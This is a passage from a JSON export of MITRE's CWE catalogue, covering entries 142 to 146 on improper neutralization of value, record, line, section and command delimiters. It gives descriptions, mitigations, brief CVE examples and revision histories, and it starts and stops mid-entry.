Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Parameter Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Parameter/Argument Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"142":{"attr":{"@_ID":"142","@_Name":"Improper Neutralization of Value Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as value delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that value delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2000-0293","Description":"Multiple internal space, insufficient quoting - program does not use proper delimiter between values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Value Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Value Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Value Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"143":{"attr":{"@_ID":"143","@_Name":"Improper Neutralization of Record Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as record delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that record delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1982","Description":"Carriage returns in subject field allow adding new records to data file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1982"},{"Reference":"CVE-2001-0527","Description":"Attacker inserts carriage returns and \\"|\\" field separator characters to add new user/privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0527"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Record Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Record Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Record Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"144":{"attr":{"@_ID":"144","@_Name":"Improper Neutralization of Line Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as line delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"93","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that line delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0267","Description":"Linebreak in field of PHP script allows admin privileges when written to data file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0267"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Line Delimiter"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}}},"Notes":{"Note":{"#text":"Depending on the language and syntax being used, this could be the same as the record delimiter (CWE-143).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Line Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Line Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"145":{"attr":{"@_ID":"145","@_Name":"Improper Neutralization of Section Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as section delimiters when they are sent to a downstream component.","Extended_Description":{"xhtml:p":["As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","One example of a section delimiter is the boundary string in a multipart MIME message. In many cases, doubled line delimiters can serve as a section delimiter."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"93","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that section delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Section Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}}},"Notes":{"Note":{"#text":"Depending on the language and syntax being used, this could be the same as the record delimiter (CWE-143).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Section Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Section Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"146":{"attr":{"@_ID":"146","@_Name":"Improper Neutralization of Expression/Command Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as expression or command delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that inter-expression and inter-command delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Delimiter between Expressions or Commands"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"6"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Embedded Delimiters&#34;, Page 408"}}},"Notes":{"Note":{"#text":"A shell metacharacter (covered in CWE-150) is one example of a potential delimiter that may need to be neutralized.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Applicable_Platforms, Description, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content 